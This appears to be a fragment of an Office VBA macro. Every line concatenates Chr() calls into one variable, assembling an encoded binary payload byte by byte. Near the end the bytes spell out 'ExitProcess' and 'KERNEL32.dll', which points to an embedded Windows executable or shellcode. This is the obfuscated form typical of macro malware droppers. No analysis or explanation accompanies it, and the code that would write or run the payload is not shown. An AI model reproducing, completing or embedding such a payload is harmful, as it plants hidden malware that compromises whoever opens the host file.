wvWPLP=wvWPLP&Chr(119)&Chr(185)&Chr(209)&Chr(225)&Chr(5)&Chr(207)&Chr(38)&Chr(120)&Chr(90)&Chr(243)&Chr(192)&Chr(188)&Chr(184)&Chr(12)&Chr(211)&Chr(233)&Chr(138)&Chr(157)&Chr(7)&Chr(7)&Chr(247)&Chr(71)&Chr(242)&Chr(253)&Chr(193)&Chr(236)&Chr(83)&Chr(169)&Chr(8)&Chr(31)&Chr(19)&Chr(85)&Chr(249)&Chr(32)&Chr(221)&Chr(134)&Chr(88)&Chr(76)&Chr(185)&Chr(82)&Chr(126)&Chr(166)&Chr(49)&Chr(125)&Chr(50)&Chr(164)&Chr(97)&Chr(141)&Chr(82)&Chr(179)&Chr(79)&Chr(254)&Chr(133)&Chr(105)&Chr(99)&Chr(238)&Chr(47)&Chr(150)&Chr(84)&Chr(114)&Chr(179)&Chr(144)&Chr(42)&Chr(78)&Chr(125)&Chr(145)&Chr(157)&Chr(43)&Chr(86)&Chr(225)&Chr(19)&Chr(82)&Chr(186)&Chr(176)&Chr(116)&Chr(56)&Chr(163)&Chr(216)&Chr(119)&Chr(196)&Chr(186)&Chr(220)&Chr(25)&Chr(75)&Chr(58)&Chr(9)&Chr(185)&Chr(14)&Chr(121)&Chr(108)&Chr(135)&Chr(225)&Chr(20)&Chr(200)&Chr(56)&Chr(35)&Chr(148)&Chr(98)&Chr(185)&Chr(127)
wvWPLP=wvWPLP&Chr(128)&Chr(248)&Chr(252)&Chr(151)&Chr(64)&Chr(193)&Chr(62)&Chr(250)&Chr(184)&Chr(148)&Chr(155)&Chr(168)&Chr(67)&Chr(245)&Chr(156)&Chr(43)&Chr(36)&Chr(152)&Chr(38)&Chr(53)&Chr(167)&Chr(31)&Chr(79)&Chr(254)&Chr(229)&Chr(134)&Chr(175)&Chr(48)&Chr(196)&Chr(3)&Chr(225)&Chr(33)&Chr(90)&Chr(168)&Chr(73)&Chr(52)&Chr(128)&Chr(184)&Chr(120)&Chr(191)&Chr(238)&Chr(234)&Chr(53)&Chr(14)&Chr(107)&Chr(171)&Chr(231)&Chr(3)&Chr(152)&Chr(251)&Chr(113)&Chr(21)&Chr(39)&Chr(88)&Chr(32)&Chr(44)&Chr(81)&Chr(205)&Chr(126)&Chr(187)&Chr(180)&Chr(179)&Chr(135)&Chr(87)&Chr(56)&Chr(182)&Chr(235)&Chr(128)&Chr(51)&Chr(84)&Chr(231)&Chr(190)&Chr(55)&Chr(131)&Chr(254)&Chr(4)&Chr(243)&Chr(220)&Chr(173)&Chr(254)&Chr(251)&Chr(40)&Chr(129)&Chr(31)&Chr(249)&Chr(49)&Chr(87)&Chr(186)&Chr(161)&Chr(24)&Chr(92)&Chr(3)&Chr(35)&Chr(52)&Chr(92)&Chr(40)&Chr(20)&Chr(159)&Chr(73)&Chr(41)
wvWPLP=wvWPLP&Chr(6)&Chr(60)&Chr(9)&Chr(199)&Chr(142)&Chr(103)&Chr(36)&Chr(25)&Chr(138)&Chr(66)&Chr(169)&Chr(52)&Chr(86)&Chr(99)&Chr(192)&Chr(51)&Chr(89)&Chr(32)&Chr(192)&Chr(228)&Chr(149)&Chr(3)&Chr(13)&Chr(29)&Chr(54)&Chr(213)&Chr(197)&Chr(83)&Chr(61)&Chr(147)&Chr(187)&Chr(196)&Chr(6)&Chr(201)&Chr(16)&Chr(103)&Chr(62)&Chr(147)&Chr(48)&Chr(189)&Chr(222)&Chr(63)&Chr(28)&Chr(18)&Chr(25)&Chr(86)&Chr(160)&Chr(151)&Chr(160)&Chr(212)&Chr(18)&Chr(37)&Chr(161)&Chr(231)&Chr(159)&Chr(39)&Chr(134)&Chr(206)&Chr(84)&Chr(36)&Chr(206)&Chr(135)&Chr(166)&Chr(192)&Chr(1)&Chr(78)&Chr(26)&Chr(101)&Chr(254)&Chr(49)&Chr(53)&Chr(34)&Chr(73)&Chr(211)&Chr(150)&Chr(22)&Chr(116)&Chr(97)&Chr(80)&Chr(205)&Chr(168)&Chr(44)&Chr(99)&Chr(185)&Chr(206)&Chr(44)&Chr(7)&Chr(50)&Chr(105)&Chr(234)&Chr(9)&Chr(6)&Chr(13)&Chr(107)&Chr(123)&Chr(216)&Chr(183)&Chr(39)&Chr(159)&Chr(253)
wvWPLP=wvWPLP&Chr(107)&Chr(117)&Chr(167)&Chr(122)&Chr(25)&Chr(197)&Chr(171)&Chr(250)&Chr(180)&Chr(18)&Chr(16)&Chr(117)&Chr(252)&Chr(76)&Chr(17)&Chr(70)&Chr(42)&Chr(112)&Chr(19)&Chr(131)&Chr(252)&Chr(38)&Chr(79)&Chr(0)&Chr(193)&Chr(56)&Chr(101)&Chr(50)&Chr(240)&Chr(107)&Chr(146)&Chr(129)&Chr(164)&Chr(131)&Chr(39)&Chr(117)&Chr(231)&Chr(7)&Chr(208)&Chr(241)&Chr(90)&Chr(211)&Chr(34)&Chr(106)&Chr(39)&Chr(72)&Chr(92)&Chr(28)&Chr(227)&Chr(169)&Chr(229)&Chr(235)&Chr(183)&Chr(241)&Chr(228)&Chr(186)&Chr(191)&Chr(12)&Chr(151)&Chr(52)&Chr(104)&Chr(161)&Chr(84)&Chr(47)&Chr(169)&Chr(236)&Chr(7)&Chr(90)&Chr(193)&Chr(65)&Chr(191)&Chr(87)&Chr(206)&Chr(214)&Chr(57)&Chr(159)&Chr(72)&Chr(48)&Chr(185)&Chr(149)&Chr(4)&Chr(107)&Chr(46)&Chr(228)&Chr(81)&Chr(110)&Chr(57)&Chr(2)&Chr(232)&Chr(164)&Chr(133)&Chr(117)&Chr(61)&Chr(232)&Chr(11)&Chr(39)&Chr(77)&Chr(198)&Chr(86)&Chr(155)
wvWPLP=wvWPLP&Chr(248)&Chr(225)&Chr(226)&Chr(157)&Chr(141)&Chr(189)&Chr(100)&Chr(198)&Chr(133)&Chr(227)&Chr(84)&Chr(157)&Chr(36)&Chr(7)&Chr(127)&Chr(245)&Chr(187)&Chr(173)&Chr(4)&Chr(96)&Chr(115)&Chr(91)&Chr(214)&Chr(203)&Chr(173)&Chr(147)&Chr(96)&Chr(25)&Chr(22)&Chr(241)&Chr(41)&Chr(134)&Chr(159)&Chr(250)&Chr(226)&Chr(218)&Chr(196)&Chr(87)&Chr(127)&Chr(98)&Chr(29)&Chr(19)&Chr(126)&Chr(15)&Chr(119)&Chr(223)&Chr(233)&Chr(64)&Chr(56)&Chr(21)&Chr(70)&Chr(198)&Chr(226)&Chr(24)&Chr(178)&Chr(137)&Chr(196)&Chr(8)&Chr(94)&Chr(26)&Chr(157)&Chr(163)&Chr(81)&Chr(187)&Chr(199)&Chr(144)&Chr(249)&Chr(4)&Chr(247)&Chr(115)&Chr(137)&Chr(57)&Chr(147)&Chr(8)&Chr(45)&Chr(223)&Chr(39)&Chr(221)&Chr(59)&Chr(57)&Chr(238)&Chr(181)&Chr(145)&Chr(170)&Chr(190)&Chr(173)&Chr(228)&Chr(65)&Chr(204)&Chr(60)&Chr(149)&Chr(29)&Chr(249)&Chr(51)&Chr(14)&Chr(74)&Chr(234)&Chr(91)&Chr(23)&Chr(78)
wvWPLP=wvWPLP&Chr(18)&Chr(239)&Chr(113)&Chr(143)&Chr(166)&Chr(5)&Chr(53)&Chr(20)&Chr(94)&Chr(109)&Chr(198)&Chr(249)&Chr(82)&Chr(110)&Chr(250)&Chr(44)&Chr(26)&Chr(19)&Chr(152)&Chr(6)&Chr(35)&Chr(255)&Chr(212)&Chr(24)&Chr(110)&Chr(151)&Chr(61)&Chr(88)&Chr(80)&Chr(204)&Chr(142)&Chr(27)&Chr(51)&Chr(101)&Chr(1)&Chr(239)&Chr(29)&Chr(83)&Chr(52)&Chr(39)&Chr(68)&Chr(164)&Chr(222)&Chr(69)&Chr(22)&Chr(25)&Chr(244)&Chr(75)&Chr(201)&Chr(239)&Chr(45)&Chr(168)&Chr(145)&Chr(112)&Chr(31)&Chr(191)&Chr(227)&Chr(11)&Chr(59)&Chr(190)&Chr(231)&Chr(87)&Chr(128)&Chr(87)&Chr(26)&Chr(109)&Chr(67)&Chr(60)&Chr(192)&Chr(184)&Chr(89)&Chr(77)&Chr(236)&Chr(188)&Chr(193)&Chr(15)&Chr(14)&Chr(233)&Chr(72)&Chr(74)&Chr(34)&Chr(249)&Chr(7)&Chr(12)&Chr(245)&Chr(12)&Chr(83)&Chr(138)&Chr(90)&Chr(120)&Chr(95)&Chr(132)&Chr(139)&Chr(149)&Chr(241)&Chr(122)&Chr(72)&Chr(195)&Chr(231)&Chr(214)
wvWPLP=wvWPLP&Chr(23)&Chr(53)&Chr(104)&Chr(181)&Chr(203)&Chr(43)&Chr(45)&Chr(234)&Chr(211)&Chr(94)&Chr(103)&Chr(155)&Chr(117)&Chr(25)&Chr(104)&Chr(129)&Chr(140)&Chr(132)&Chr(249)&Chr(15)&Chr(35)&Chr(98)&Chr(151)&Chr(135)&Chr(164)&Chr(88)&Chr(15)&Chr(68)&Chr(21)&Chr(2)&Chr(95)&Chr(113)&Chr(82)&Chr(229)&Chr(135)&Chr(82)&Chr(173)&Chr(58)&Chr(247)&Chr(233)&Chr(185)&Chr(137)&Chr(98)&Chr(128)&Chr(162)&Chr(240)&Chr(161)&Chr(118)&Chr(121)&Chr(198)&Chr(11)&Chr(167)&Chr(236)&Chr(64)&Chr(0)&Chr(182)&Chr(118)&Chr(206)&Chr(195)&Chr(85)&Chr(93)&Chr(165)&Chr(210)&Chr(250)&Chr(232)&Chr(43)&Chr(99)&Chr(120)&Chr(64)&Chr(34)&Chr(131)&Chr(133)&Chr(179)&Chr(149)&Chr(202)&Chr(143)&Chr(96)&Chr(254)&Chr(217)&Chr(238)&Chr(173)&Chr(118)&Chr(246)&Chr(87)&Chr(65)&Chr(44)&Chr(80)&Chr(250)&Chr(235)&Chr(45)&Chr(207)&Chr(86)&Chr(216)&Chr(11)&Chr(16)&Chr(125)&Chr(155)&Chr(209)&Chr(11)&Chr(99)
wvWPLP=wvWPLP&Chr(6)&Chr(232)&Chr(31)&Chr(239)&Chr(232)&Chr(15)&Chr(64)&Chr(12)&Chr(219)&Chr(167)&Chr(185)&Chr(172)&Chr(162)&Chr(86)&Chr(28)&Chr(98)&Chr(4)&Chr(245)&Chr(20)&Chr(152)&Chr(31)&Chr(126)&Chr(204)&Chr(227)&Chr(205)&Chr(154)&Chr(245)&Chr(240)&Chr(224)&Chr(161)&Chr(237)&Chr(131)&Chr(51)&Chr(180)&Chr(125)&Chr(60)&Chr(107)&Chr(70)&Chr(125)&Chr(49)&Chr(233)&Chr(156)&Chr(81)&Chr(8)&Chr(168)&Chr(175)&Chr(181)&Chr(73)&Chr(43)&Chr(81)&Chr(238)&Chr(17)&Chr(235)&Chr(49)&Chr(85)&Chr(144)&Chr(40)&Chr(228)&Chr(191)&Chr(76)&Chr(247)&Chr(226)&Chr(43)&Chr(197)&Chr(255)&Chr(239)&Chr(197)&Chr(74)&Chr(73)&Chr(185)&Chr(103)&Chr(46)&Chr(6)&Chr(208)&Chr(249)&Chr(101)&Chr(57)&Chr(179)&Chr(95)&Chr(80)&Chr(64)&Chr(106)&Chr(58)&Chr(103)&Chr(166)&Chr(76)&Chr(151)&Chr(64)&Chr(138)&Chr(186)&Chr(165)&Chr(207)&Chr(116)&Chr(223)&Chr(148)&Chr(112)&Chr(75)&Chr(9)&Chr(53)&Chr(216)
wvWPLP=wvWPLP&Chr(164)&Chr(146)&Chr(37)&Chr(178)&Chr(157)&Chr(197)&Chr(99)&Chr(142)&Chr(129)&Chr(132)&Chr(76)&Chr(142)&Chr(53)&Chr(49)&Chr(218)&Chr(62)&Chr(248)&Chr(102)&Chr(117)&Chr(91)&Chr(17)&Chr(110)&Chr(172)&Chr(238)&Chr(48)&Chr(214)&Chr(233)&Chr(200)&Chr(84)&Chr(190)&Chr(225)&Chr(179)&Chr(125)&Chr(142)&Chr(113)&Chr(250)&Chr(109)&Chr(253)&Chr(90)&Chr(145)&Chr(29)&Chr(42)&Chr(52)&Chr(64)&Chr(26)&Chr(8)&Chr(91)&Chr(149)&Chr(112)&Chr(218)&Chr(137)&Chr(2)&Chr(30)&Chr(159)&Chr(65)&Chr(190)&Chr(24)&Chr(106)&Chr(208)&Chr(211)&Chr(139)&Chr(97)&Chr(145)&Chr(173)&Chr(174)&Chr(229)&Chr(140)&Chr(140)&Chr(118)&Chr(44)&Chr(64)&Chr(17)&Chr(176)&Chr(128)&Chr(54)&Chr(112)&Chr(253)&Chr(120)&Chr(49)&Chr(80)&Chr(135)&Chr(23)&Chr(67)&Chr(212)&Chr(3)&Chr(253)&Chr(108)&Chr(200)&Chr(147)&Chr(132)&Chr(50)&Chr(147)&Chr(22)&Chr(111)&Chr(192)&Chr(42)&Chr(149)&Chr(198)&Chr(161)&Chr(21)
wvWPLP=wvWPLP&Chr(112)&Chr(92)&Chr(121)&Chr(102)&Chr(22)&Chr(122)&Chr(244)&Chr(161)&Chr(193)&Chr(245)&Chr(31)&Chr(229)&Chr(206)&Chr(45)&Chr(47)&Chr(128)&Chr(147)&Chr(197)&Chr(186)&Chr(127)&Chr(197)&Chr(183)&Chr(251)&Chr(218)&Chr(2)&Chr(138)&Chr(144)&Chr(85)&Chr(154)&Chr(13)&Chr(60)&Chr(120)&Chr(158)&Chr(224)&Chr(113)&Chr(175)&Chr(113)&Chr(143)&Chr(153)&Chr(27)&Chr(233)&Chr(85)&Chr(140)&Chr(202)&Chr(3)&Chr(237)&Chr(54)&Chr(241)&Chr(224)&Chr(140)&Chr(158)&Chr(80)&Chr(221)&Chr(105)&Chr(50)&Chr(171)&Chr(179)&Chr(93)&Chr(108)&Chr(134)&Chr(110)&Chr(185)&Chr(242)&Chr(102)&Chr(27)&Chr(16)&Chr(113)&Chr(182)&Chr(192)&Chr(220)&Chr(155)&Chr(77)&Chr(118)&Chr(44)&Chr(100)&Chr(82)&Chr(44)&Chr(128)&Chr(78)&Chr(53)&Chr(24)&Chr(216)&Chr(176)&Chr(136)&Chr(45)&Chr(19)&Chr(72)&Chr(127)&Chr(7)&Chr(55)&Chr(236)&Chr(113)&Chr(111)&Chr(63)&Chr(255)&Chr(142)&Chr(250)&Chr(172)&Chr(137)&Chr(14)
wvWPLP=wvWPLP&Chr(71)&Chr(157)&Chr(93)&Chr(205)&Chr(73)&Chr(131)&Chr(24)&Chr(15)&Chr(184)&Chr(121)&Chr(1)&Chr(140)&Chr(128)&Chr(130)&Chr(209)&Chr(37)&Chr(193)&Chr(109)&Chr(5)&Chr(141)&Chr(41)&Chr(234)&Chr(3)&Chr(146)&Chr(204)&Chr(61)&Chr(0)&Chr(105)&Chr(214)&Chr(34)&Chr(96)&Chr(204)&Chr(175)&Chr(24)&Chr(228)&Chr(150)&Chr(159)&Chr(106)&Chr(133)&Chr(149)&Chr(30)&Chr(253)&Chr(229)&Chr(189)&Chr(217)&Chr(176)&Chr(121)&Chr(77)&Chr(19)&Chr(195)&Chr(138)&Chr(155)&Chr(36)&Chr(4)&Chr(20)&Chr(81)&Chr(152)&Chr(168)&Chr(17)&Chr(120)&Chr(237)&Chr(68)&Chr(109)&Chr(174)&Chr(252)&Chr(244)&Chr(105)&Chr(221)&Chr(214)&Chr(55)&Chr(124)&Chr(236)&Chr(225)&Chr(76)&Chr(33)&Chr(116)&Chr(247)&Chr(42)&Chr(81)&Chr(61)&Chr(250)&Chr(199)&Chr(24)&Chr(170)&Chr(72)&Chr(191)&Chr(241)&Chr(7)&Chr(195)&Chr(246)&Chr(77)&Chr(234)&Chr(137)&Chr(94)&Chr(114)&Chr(189)&Chr(31)&Chr(226)&Chr(27)&Chr(191)
wvWPLP=wvWPLP&Chr(42)&Chr(245)&Chr(129)&Chr(134)&Chr(220)&Chr(21)&Chr(123)&Chr(182)&Chr(127)&Chr(219)&Chr(228)&Chr(119)&Chr(255)&Chr(117)&Chr(129)&Chr(239)&Chr(166)&Chr(134)&Chr(217)&Chr(209)&Chr(152)&Chr(76)&Chr(141)&Chr(215)&Chr(91)&Chr(19)&Chr(168)&Chr(26)&Chr(18)&Chr(232)&Chr(214)&Chr(33)&Chr(38)&Chr(125)&Chr(42)&Chr(212)&Chr(122)&Chr(73)&Chr(63)&Chr(114)&Chr(57)&Chr(78)&Chr(28)&Chr(109)&Chr(99)&Chr(225)&Chr(64)&Chr(76)&Chr(182)&Chr(124)&Chr(193)&Chr(63)&Chr(235)&Chr(58)&Chr(174)&Chr(249)&Chr(71)&Chr(63)&Chr(248)&Chr(27)&Chr(130)&Chr(208)&Chr(192)&Chr(34)&Chr(151)&Chr(175)&Chr(199)&Chr(188)&Chr(109)&Chr(182)&Chr(128)&Chr(243)&Chr(33)&Chr(227)&Chr(207)&Chr(2)&Chr(71)&Chr(121)&Chr(185)&Chr(156)&Chr(227)&Chr(230)&Chr(70)&Chr(61)&Chr(75)&Chr(78)&Chr(101)&Chr(225)&Chr(189)&Chr(92)&Chr(170)&Chr(39)&Chr(86)&Chr(205)&Chr(221)&Chr(112)&Chr(48)&Chr(160)&Chr(14)&Chr(246)
wvWPLP=wvWPLP&Chr(164)&Chr(137)&Chr(252)&Chr(103)&Chr(127)&Chr(18)&Chr(224)&Chr(86)&Chr(19)&Chr(251)&Chr(60)&Chr(165)&Chr(38)&Chr(148)&Chr(60)&Chr(116)&Chr(145)&Chr(133)&Chr(66)&Chr(179)&Chr(198)&Chr(204)&Chr(83)&Chr(235)&Chr(129)&Chr(188)&Chr(8)&Chr(235)&Chr(121)&Chr(254)&Chr(109)&Chr(210)&Chr(12)&Chr(29)&Chr(83)&Chr(0)&Chr(110)&Chr(240)&Chr(248)&Chr(35)&Chr(171)&Chr(253)&Chr(136)&Chr(35)&Chr(30)&Chr(117)&Chr(2)&Chr(197)&Chr(90)&Chr(44)&Chr(6)&Chr(159)&Chr(55)&Chr(38)&Chr(84)&Chr(152)&Chr(180)&Chr(231)&Chr(212)&Chr(174)&Chr(237)&Chr(141)&Chr(205)&Chr(34)&Chr(48)&Chr(129)&Chr(142)&Chr(78)&Chr(141)&Chr(238)&Chr(228)&Chr(174)&Chr(236)&Chr(152)&Chr(149)&Chr(157)&Chr(232)&Chr(192)&Chr(5)&Chr(66)&Chr(219)&Chr(50)&Chr(127)&Chr(34)&Chr(129)&Chr(159)&Chr(240)&Chr(224)&Chr(73)&Chr(232)&Chr(93)&Chr(184)&Chr(126)&Chr(142)&Chr(32)&Chr(72)&Chr(232)&Chr(145)&Chr(30)&Chr(168)
wvWPLP=wvWPLP&Chr(190)&Chr(97)&Chr(246)&Chr(225)&Chr(190)&Chr(213)&Chr(196)&Chr(255)&Chr(19)&Chr(111)&Chr(174)&Chr(76)&Chr(239)&Chr(119)&Chr(60)&Chr(16)&Chr(153)&Chr(247)&Chr(46)&Chr(239)&Chr(107)&Chr(95)&Chr(98)&Chr(157)&Chr(27)&Chr(45)&Chr(44)&Chr(63)&Chr(121)&Chr(138)&Chr(166)&Chr(241)&Chr(188)&Chr(173)&Chr(37)&Chr(221)&Chr(26)&Chr(31)&Chr(84)&Chr(238)&Chr(157)&Chr(199)&Chr(120)&Chr(91)&Chr(225)&Chr(5)&Chr(31)&Chr(10)&Chr(219)&Chr(204)&Chr(108)&Chr(155)&Chr(127)&Chr(39)&Chr(88)&Chr(134)&Chr(129)&Chr(19)&Chr(194)&Chr(11)&Chr(240)&Chr(249)&Chr(170)&Chr(241)&Chr(5)&Chr(14)&Chr(129)&Chr(194)&Chr(252)&Chr(200)&Chr(217)&Chr(159)&Chr(63)&Chr(87)&Chr(184)&Chr(192)&Chr(228)&Chr(228)&Chr(92)&Chr(81)&Chr(6)&Chr(134)&Chr(75)&Chr(100)&Chr(5)&Chr(82)&Chr(190)&Chr(9)&Chr(56)&Chr(57)&Chr(39)&Chr(216)&Chr(46)&Chr(196)&Chr(16)&Chr(98)&Chr(254)&Chr(202)&Chr(198)&Chr(152)
wvWPLP=wvWPLP&Chr(9)&Chr(50)&Chr(127)&Chr(59)&Chr(110)&Chr(116)&Chr(183)&Chr(217)&Chr(156)&Chr(18)&Chr(89)&Chr(31)&Chr(125)&Chr(213)&Chr(50)&Chr(7)&Chr(101)&Chr(198)&Chr(100)&Chr(74)&Chr(76)&Chr(70)&Chr(58)&Chr(103)&Chr(176)&Chr(46)&Chr(200)&Chr(249)&Chr(201)&Chr(97)&Chr(164)&Chr(16)&Chr(103)&Chr(74)&Chr(228)&Chr(3)&Chr(9)&Chr(79)&Chr(242)&Chr(107)&Chr(170)&Chr(26)&Chr(33)&Chr(146)&Chr(233)&Chr(7)&Chr(60)&Chr(46)&Chr(65)&Chr(90)&Chr(221)&Chr(46)&Chr(219)&Chr(44)&Chr(179)&Chr(172)&Chr(3)&Chr(249)&Chr(141)&Chr(189)&Chr(39)&Chr(111)&Chr(247)&Chr(61)&Chr(0)&Chr(117)&Chr(231)&Chr(102)&Chr(220)&Chr(153)&Chr(159)&Chr(202)&Chr(12)&Chr(128)&Chr(217)&Chr(19)&Chr(192)&Chr(92)&Chr(69)&Chr(208)&Chr(147)&Chr(207)&Chr(9)&Chr(179)&Chr(79)&Chr(241)&Chr(130)&Chr(183)&Chr(33)&Chr(13)&Chr(18)&Chr(100)&Chr(7)&Chr(172)&Chr(167)&Chr(181)&Chr(71)&Chr(206)&Chr(4)&Chr(107)
wvWPLP=wvWPLP&Chr(68)&Chr(128)&Chr(22)&Chr(254)&Chr(150)&Chr(203)&Chr(239)&Chr(109)&Chr(183)&Chr(45)&Chr(227)&Chr(28)&Chr(107)&Chr(108)&Chr(162)&Chr(91)&Chr(89)&Chr(226)&Chr(74)&Chr(50)&Chr(23)&Chr(245)&Chr(117)&Chr(198)&Chr(197)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(44)&Chr(48)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(84)&Chr(48)&Chr(0)&Chr(0)&Chr(56)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(156)&Chr(0)&Chr(69)&Chr(120)&Chr(105)&Chr(116)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(75)&Chr(69)&Chr(82)&Chr(78)&Chr(69)&Chr(76)&Chr(51)&Chr(50)&Chr(46)&Chr(100)&Chr(108)&Chr(108)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
